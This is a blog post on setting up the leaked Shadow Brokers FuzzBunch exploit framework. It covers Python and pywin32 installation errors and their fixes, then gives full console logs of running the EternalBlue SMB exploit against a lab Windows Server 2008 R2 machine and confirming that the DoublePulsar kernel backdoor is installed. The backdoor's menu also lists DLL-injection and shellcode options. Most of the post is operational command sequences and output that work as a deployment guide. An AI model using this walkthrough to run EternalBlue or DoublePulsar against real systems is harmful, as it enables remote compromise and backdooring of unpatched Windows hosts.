Playing with and Setting up exploit Framework from shadowbroker’s Dump

Hello there!
Over this weekend theshadowbrokers leaked some hacking tools. In this blog post we will see how to setup this framework and what are the prerequisite for successful exploitation using this framework.

We started our research by downloading the dump from the misterch0c/shadowbroker

Upon downloading, and fiddling around we came to know that the framework can be started by executing the file known as fb.py which is located at below mentioned path.
It required python2.6  as mentioned by some on the twitter.

ShadowBroker1

We were running this on win7 32bit system. On executing the above mentioned file, we got few errors. On googling the errors we found out that pywin32 library was missing and we needed to install it in order to get rid of that error.

C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\windows>python fb.py
Traceback (most recent call last):
  File "fb.py", line 37, in <module>
    from fuzzbunch.edfplugin import EDFPlugin
  File "C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\windows\fuzzbun
ch\edfplugin.py", line 5, in <module>
    import edfexecution
  File "C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\windows\fuzzbun
ch\edfexecution.py", line 30, in <module>
    import win32pipe
ImportError: No module named win32pipe

We tried installing the 221 build of pywin32, but we faced some errors again. We received error r6034, and some other error related to missing dll. A quick search pointed out that running pywin32_postinstall.py file from c:\python26\Scripts with administrative privileges solves the issue.

C:\Python26\Scripts>python pywin32_postinstall.py
pywin32_postinstall.py: A post-install script for the pywin32 extensions.

This should be run automatically after installation, but if it fails you
can run it again with a '-install' parameter, to ensure the environment
is setup correctly.

Additional Options:
  -wait pid : Wait for the specified process to terminate before starting.
  -silent   : Don't display the "Abort/Retry/Ignore" dialog for files in use.
  -quiet    : Don't display progress messages.

C:\Python26\Scripts>python pywin32_postinstall.py -install
Copied pythoncom26.dll to C:\Windows\system32\pythoncom26.dll
Copied pythoncomloader26.dll to C:\Windows\system32\pythoncomloader26.dll
Copied pywintypes26.dll to C:\Windows\system32\pywintypes26.dll
Registered: Python.Interpreter
Registered: Python.Dictionary
Registered: Python
-> Software\Python\PythonCore\2.6\Help[None]=None
-> Software\Python\PythonCore\2.6\Help\Pythonwin Reference[None]='C:\\Python26\\
Lib\\site-packages\\PyWin32.chm'
Pythonwin has been registered in context menu
Creating directory C:\Python26\Lib\site-packages\win32com\gen_py
Shortcut for Pythonwin created
Shortcut to documentation created
The pywin32 extensions were successfully installed.

We once again tried running fb.py and we received another error as shown below.

C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\windows>python fb.py

--[ Version 3.5.1

[*] Loading Plugins
===============================================================
=
= Encountered an unhandled error. Please provide the following
= information to the developer
=
===============================================================
Traceback (most recent call last):
 File "C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\windows\fuzzbun
ch\exception.py", line 66, in wrap
 ret = fn(*args, **kwargs)
 File "fb.py", line 83, in setup_and_run
 load_plugins(fb)
 File "fb.py", line 72, in load_plugins
 addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
 File "C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\windows\fuzzbun
ch\pluginfinder.py", line 78, in addplugins
 plugins = getpluginlist(location, bin)
 File "C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\windows\fuzzbun
ch\pluginfinder.py", line 36, in getpluginlist
 fblist = getextensionfiles(location, FB_CONFIG_EXT) # get list o
f .fb files
 File "C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\windows\fuzzbun
ch\pluginfinder.py", line 21, in getextensionfiles
 for file in os.listdir(location)
WindowsError: [Error 3] The system cannot find the path specified: 'C:\\Users\\M
VnD3X\\Desktop\\ShadowBroker\\shadowbroker-master\\windows\\listeningposts/*.*'

C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\windows>

We created a folder as it was searching for one with the name listeningposts and ran the script again and this time we were successful. Output of it is shown below:

C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\windows>python fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute


[+] Set FbStorage => C:\Users\User\Desktop\ShadowBroker\shadowbroker-master\wi
ndows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 192.168.99.102
[?] Default Callback IP Address [] : 192.168.99.101
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : C:\Users\User\Desktop\Logs S
[*] Checking C:\Users\User\Desktop\Logs S for projects
Index     Project
-----     -------
0         Create a New Project

[?] Project [0] : Test
Index     Project
-----     -------
0         Create a New Project

[?] Project [0] : 0
[?] New Project Name : Test
[?] Set target log directory to 'C:\Users\User\Desktop\Logs S\test\z192.168.99
.102'? [Yes] : yes

[*] Initializing Global State
[+] Set TargetIp => 192.168.99.102
[+] Set CallbackIp => 192.168.99.101

[!] Redirection OFF
[+] Set LogDir => C:\Users\User\Desktop\Logs S\test\z192.168.99.102
[+] Set Project => test

fb > help

Core Commands
=============

  Command         Description
  -------         -----------
  !               Shortcut for shell
  ?               Shortcut for help
  autorun         Set autorun mode
  back            Leave the current context back to the default
  banner          Print the startup banner
  changeprompt    Change the command prompt
  echo            Echo a message
  enter           Enter the context of a plugin
  eof             Quit program (CTRL-D)
  exit            Alias for back
  help            Print out help
  history         Run a previous command.
  info            Print information about the current context
  mark            Mark a session item
  python          Drop to an interactive Python interpreter
  quit            Quit fuzzbunch
  redirect        Configure redirection
  resizeconsole   None
  retarget        Set basic target info
  script          Run a script
  session         Show session items
  setg            Set a global variable
  shell           Execute a shell command
  show            Show plugin info
  sleep           Sleep for n seconds
  standardop      Print standard OP usage message
  toolpaste       Paste and convert data from external tool output
  unsetg          Unset a global variable
  use             Activate a plugin for use and enter context

fb >

We immediately tried running eternalblue exploit against w2k8 R2 and it worked nicely.

fb Special (Eternalblue) > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.28.128.5
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.28.128.5
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.
[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address
[?] TargetIp [172.28.128.5] :

[*]  TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.
[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.
[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.
[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS
    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] :
[!] Preparing to Execute Eternalblue
[*]  Mode :: Delivery mechanism
   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] :

[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1

[?] Destination IP [172.28.128.5] :
[?] Destination Port [445] :

[+] (TCP) Local 172.28.128.5:445
[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================
Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              172.28.128.5
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (52 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
0x00000030  6b 20 31 00                                      k 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending SMBv2 buffers
        .............DONE.
    [+] Sending large SMBv1 buffer..DONE.
    [+] Sending final SMBv2 buffers......DONE.
    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor NOT installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Trying again with 17 Groom Allocations
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (52 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
0x00000030  6b 20 31 00                                      k 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending SMBv2 buffers
        ..................DONE.
    [+] Sending large SMBv1 buffer..DONE.
    [+] Sending final SMBv2 buffers......DONE.
    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x64 (64-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

fb Special (Eternalblue) >
fb Special (Eternalblue) > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.28.128.5
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name              Value
----              -----
NetworkTimeout    60
TargetIp          172.28.128.5
TargetPort        445
Protocol          SMB
Architecture      x64
Function          Ping

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1
for no timeout.
[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address
[?] TargetIp [172.28.128.5] :

[*]  TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak
   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*]  Architecture :: Architecture of the target OS
    0) x86     x86 32-bits
   *1) x64     x64 64-bits
[?] Architecture [1] :

[*]  Function :: Operation for backdoor to perform
    0) OutputInstall     Only output the install shellcode to a binary file on d
isk.
   *1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [1] :

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1

[?] Destination IP [172.28.128.5] :
[?] Destination Port [445] :
[+] (TCP) Local 172.28.128.5:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name              Value
----              -----
NetworkTimeout    60
TargetIp          172.28.128.5
TargetPort        445
Protocol          SMB
Architecture      x64
Function          Ping

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x3C51F76
3
    SMB Connection string is: Windows Server 2008 R2 Standard 7601 Service Pack
1
    Target OS is: 2008 R2 x64
    Target SP is: 1
        [+] Backdoor installed
        [+] Command completed successfully
[+] Doublepulsar Succeeded

fb Payload (Doublepulsar) >


Note: We are currently playing with the exploits as we get time and we may come up with a walkthrough for a few. Currently eternalblue works out of the box and installs doublepulsar as shown above.

Advertisements